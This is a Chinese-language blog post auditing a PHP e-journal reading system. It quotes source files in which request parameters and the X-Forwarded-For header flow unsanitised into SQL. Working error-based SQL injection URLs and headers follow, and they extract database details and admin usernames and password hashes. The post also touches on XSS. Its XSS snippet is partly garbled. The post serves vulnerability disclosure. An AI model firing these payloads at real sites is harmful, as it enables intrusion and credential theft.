万众电子期刊在线阅读系统PHP版本sql注入

因为业务需要,就采取了这套系统来搭建。稍微看下,发现这套系统的问题太多了

首先来看核心文件
/includes/other.fun.php
[php]
//字符串格式化
function function_cleanstr($str) {
$newstr = htmlspecialchars(trim($str)); //删除两侧空格并转码html
return $newstr;
}[/php]

仅仅是删除了两边的空格并进行了转码, 我们知道htmlspecialchars()函数只对&、’、”、<、>符号进行转译成html特殊符号
htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体。
预定义的字符是:[php]
& (和号) 成为 &
" (双引号) 成为 "
' (单引号) 成为 '
< (小于) 成为 <
> (大于) 成为 >
[/php]
对应的反编码函数为 htmlspecialchars_decode

可是没有考虑 , 空格 ( ) ; 等,所以SQLinject仍然可以存在。XSS依旧可以进行类似
[php]


">>

XSS

">>

>>

XSS

">
onload=alert(XSS)>

$system=_query("SELECT * FROM magacms_system");
$_pagesize=$system['pagenum'];
$type=$_GET['type'];
if($system['rewrite']==0){
$typeurl[0]='?type=';
$typeurl[1]='';
$pageurl[0]='?';
$pageurl[1]='';
$pageurl[2]='page=';
$pageurl[3]='';
$reade[0]='reade/?id=';
$reade[1]='';
}else{
$typeurl[0]='type_';
$typeurl[1]='.html';
$pageurl[0]='so_';
$pageurl[1]='';
$pageurl[2]='_';
$pageurl[3]='.html';
$reade[0]='reade/maga_';
$reade[1]='.html';
}
$newmaga=_query("SELECT id FROM magacms_maga ORDER BY id DESC LIMIT 1");
$_num=_mysqlnum("SELECT id FROM magacms_maga WHERE maganame LIKE'%$keyword%'"); //然后带入了数据库
[/php]
我们简单的写个报错语句
[php]search.php?keyword=a'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#
[/php]看看效果,直接傻眼
12
[php]/search.php?keyword=a%27and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,username,0x3a,password)from%20magacms_user%20limit%201),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23[/php]
13
/gbook/index.php
没有作任何处理的sql注入
[php]
require dirname(dirname(__FILE__)).'/includes/main.inc.php';
$id=$_GET['id'];//直接把传递的id进行赋值给$id
if(!_query("SELECT id FROM magacms_maga WHERE id='$id' LIMIT 1"))//直接带入了sql语句
{
function_alert('非法ID!','');
}
?>
[/php]
14
还有一处
[php]
if ($_GET['action']=='addgbook'){
$id=$_GET['id'];
$username=function_cleanstr($_POST['username']);
$gbooktext=function_cleanstr($_POST['gbooktext']);
$time=date('Y年m月d日 H:i',time());
$ip=function_getRealIp(); //这个ip没有处理,我们之间查看下是直接插入了数据库
if($username==''){
function_alert('请留下您的大名!', '');
}
if($gbooktext=='' || $gbooktext=='文明上网,理性发言!'){
function_alert('留言内容不能为空!', '');
}
if(!function_strlen($username,3,10)){
function_alert('你的姓名必须介于3~10个字符!', '');
}
if(!function_strlen($gbooktext,15,144)){
function_alert('留言内容必须介于15~144个字符!', '');
}
_insert("INSERT INTO magacms_gbook(username,time,text,magaid,ip) VALUES ('$username','$time','$gbooktext','$id','$ip')");
function_alert('', '?id='.$id);
}
?>
[/php]
我们看下function_getRealIp这个函数,获取IP的,一般来说,这里如果处理不好会直接导致注入的产生
[php]
function function_getRealIp() {
$ip = false;
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
$ip = $_SERVER["HTTP_CLIENT_IP"];
}
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ips = explode(", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) {
array_unshift($ips, $ip);
$ip = FALSE;
}
for ($i = 0; $i < count($ips); $i++) {
if (!@eregi("^(10│172.16│192.168).", $ips[$i])) //php版本偏高,所以eregi报错{
$ip = $ips[$i];
break;
}
}
}
return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);
}
[/php]
11
可以看到是直接输出了222.222.222.222’and 1=1
如果带入数据库且不是可以直接注入了。
我们来看实际的例子
15
[php]X-Forwarded-For:222.222.222.222'or updatexml(1,concat(0x3a,concat(database(),0x3a,user(),0x3a,version())),0) or'[/php]
19
[php]X-Forwarded-For:222.222.222.222'or updatexml(1,concat(0x3a,(select concat(username,0x3a,password)from magacms_user limit 1)),0) or'
[/php]
20
再来一处
Index.php
[php]
require_once dirname(__file__) . '/includes/main.inc.php';
$siteinfo = _query("SELECT * FROM magacms_siteinfo");
$system = _query("SELECT * FROM magacms_system");
$_pagesize = $system['pagenum'];
$type = $_GET['type']; //直接把获取的type赋值给$type
if ($system['rewrite'] == 0) {
$typeurl[0] = '?type=';
$typeurl[1] = '';
$pageurl[0] = '?type=';
$pageurl[1] = '&';
$pageurl[2] = 'page=';
$pageurl[3] = '';
$reade[0] = 'reade/?id=';
$reade[1] = '';
} else {
$typeurl[0] = 'type_';
$typeurl[1] = '.html';
if ($type == '') {
$pageurl[0] = 'index';
} else {
$pageurl[0] = 'type_';
}
$pageurl[1] = '_';
$pageurl[2] = '';
$pageurl[3] = '.html';
$reade[0] = 'reade/maga_';
$reade[1] = '.html';
}
if ($type == '') {
$_num = _mysqlnum("SELECT id FROM magacms_maga");
require_once ROOTDIR . '/template/PageHeader.inc.php';
if ($system['sort'] == 1) {
$result = mysql_query("SELECT * FROM magacms_maga ORDER BY id DESC LIMIT $_pagenum,$_pagesize");
} else {
$result = mysql_query("SELECT * FROM magacms_maga ORDER BY id ASC LIMIT $_pagenum,$_pagesize");
}
} else {
if (!_query("SELECT id FROM magacms_type WHERE id='$type' LIMIT 1"))
//直接带入了查询语句 {
function_alert('', './');
} else {
$typeinfo = _query("SELECT id,name FROM magacms_type WHERE id='$type' LIMIT 1");
$typename = $typeinfo['name'];
$typeid = $typeinfo['id'];
}
$_num = _mysqlnum("SELECT id FROM magacms_maga WHERE typeid='$type'");
require_once ROOTDIR . '/template/PageHeader.inc.php';
if ($system['sort'] == 1) {
$result = mysql_query("SELECT * FROM magacms_maga WHERE typeid='$type' ORDER BY id DESC LIMIT $_pagenum,$_pagesize");
} else {
$result = mysql_query("SELECT * FROM magacms_maga WHERE typeid='$type' ORDER BY id ASC LIMIT $_pagenum,$_pagesize");
}
}
$newmaga = _query("SELECT id FROM magacms_maga ORDER BY id DESC LIMIT 1");
?>[/php]
简直...惨不忍睹,只要type不为空就可以注入了
[php]index.php?type=a'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#[/php]
14
再来一处
reade/index.php
[php]
$id=$_GET['id'];
if(!_query("SELECT * FROM magacms_maga WHERE id='$id' LIMIT 1")){
function_error('指定期刊不存在', '期刊ID非法,指定期刊不存在!', 'E009', 'index.php');
exit();
}[/php]
[php]id=52'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#[/php]
14
继续看下去
/admin/includes/global.fun.php
[php]
//登录判断
function function_login() {
session_start();
function_safety();
$username = function_cleanstr($_POST['username']);
$password = md5($_POST['password']);
$code = md5(strtoupper($_POST['code']));
if ($username == '' or $password == '') {
function_alert('用户名和密码不能为空!', 'index.php');
}
if ($code != $_SESSION['code']) {
function_alert('验证码错误!', 'index.php');
}
if (!_query("SELECT * FROM magacms_user WHERE username='$username' AND password='$password' LIMIT 1")) {
function_alert('用户名和密码错误!', 'index.php');
}
$intime = date('Y-m-d H:i:s', time());
$inip = function_getRealIp();//之前就完爆了
// setcookie('username', md5($username)); //采用cookie记忆登录状态
$_SESSION['username'] = $username; //采用session记忆登录状态
_update("UPDATE magacms_user SET intime='$intime',inip='$inip' WHERE username='$username'");
function_alert('', 'admin_main.php');
}[/php]
16
再继续
admin/cfupload/cfupload.php
[php] require dirname(dirname(dirname(__FILE__))) . '/includes/main.inc.php';
$id = getGet("id");
$row=_query("SELECT * FROM magacms_maga WHERE id='$id' LIMIT 1");
[/php]
[php]/admin/cfupload/cfupload.php?id=1%27and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23[/php]
14

后台是各种注入.这里只是拿出了前台部分可以触发到的地方。
后来进入了一个最新版的后台
17

20

1 条评论

  1. heihui

    感谢楼主的分析

发表评论